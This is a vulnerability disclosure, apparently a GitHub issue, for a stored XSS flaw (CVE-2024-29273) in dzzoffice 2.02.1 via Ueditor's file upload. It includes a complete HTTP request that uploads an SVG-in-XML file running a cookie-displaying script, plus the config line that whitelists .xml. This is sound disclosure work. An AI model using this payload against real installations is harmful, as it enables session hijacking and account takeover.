Stored XSS Vulnerability in dzzoffice 2.02.1 SC UTF8 Due to Ueditor's Uploadfile Method

[Hebing123]

Summary

There is a significant Stored Cross-Site Scripting (XSS) vulnerability identified in dzzoffice 2.02.1 SC UTF8. This vulnerability allows the upload of XML files through Ueditor's uploadfile method, leading to the possibility of an XSS exploit. The potential for harm is elevated as the malicious scripts are permanently stored on the server and executed whenever the user accesses the saved file.

Detail

The vulnerability exists due to the application's failure to properly sanitize the XML files being uploaded via the uploadfile method of Ueditor. A possible exploitation would involve the unauthorized uploading of an XML file embedded with a malicious script. In this case, the XML file contains a JavaScript script that, when run, shows the user's cookies.

POC

POST /index.php?mod=attach&op=controller&action=uploadfile HTTP/1.1
Host: 192.168.160.147:8787
Content-Length: 563
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.160.147:8787
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXifIXP0SoqrCZIbo
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie:  Hmcz_2132_saltkey=udCaCtcc; Hmcz_2132_lastvisit=1710124655; Hmcz_2132_ulastactivity=c6a8N3U0dWA9gtpEK0bssjGSNkUV6J6j8JD4d5wderSfZMkI6s_P; Hmcz_2132_auth=bd19HGU2qM6RDikVsboyLG0RFWtF0mQx0B0i2a8hGy4-P_Bmk-ITz4Kr8hXlSsNfli-Cid5WguEwml4QSLJD; Hmcz_2132_checkupgrade=1; Hmcz_2132_viewid=tid_1; Hmcz_2132_checkappupgrade=1; Hmcz_2132_sid=iIedFD; Hmcz_2132_news_index_isshow=show; Hmcz_2132_forum_lastvisit=D_index_1710135494D_1_1710135495; Hmcz_2132_lastact=1710135618%09index.php%09attach
Connection: close

------WebKitFormBoundaryXifIXP0SoqrCZIbo
Content-Disposition: form-data; name="upfile"; filename="20c5297f-deaf-43e2-84ff-94e262f28087.xml"
Content-Type: text/xml

<?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert(document.cookie); </script> </svg>
------WebKitFormBoundaryXifIXP0SoqrCZIbo--

We get in the return package (attachment parameters) in the file path DZZ/202403/11/135705v2thuiv96iyi5svx.xml

Url: http://192.168.160.147:8787/data/attachment/dzz/202403/11/135705v2thuiv96iyi5svx.xml

Impact

The impact of this vulnerability is substantial. Stored XSS attacks are potentially more devastating than other types as they can compromise a larger portion of users. Since the malicious script is stored on the server, every user who accesses the file would be a victim of the XSS attack.
In our case, the script displayed the user's cookies. However, a malicious attacker may design more harmful scripts to, for example, steal session cookies, perform actions on behalf of the user, or even carry out phishing attacks.
This vulnerability poses a serious security threat, and immediate remedial measures are recommended.

[Hebing123]

This is the vulnerability exploitation reference for CVE-2024-29273

[Hebing123]

Hello, I see in ueditor/php/config.js that you did not delete the upload whitelist of .xml file, thus causing this vulnerability, not a false positive.

dzzoffice/dzz/system/ueditor/php/config.json

Lines 65 to 70 in d8a10dc

	"fileAllowFiles": [
	".png", ".jpg", ".jpeg", ".gif", ".bmp",
	".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg",
	".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid",
	".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso",
	".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml"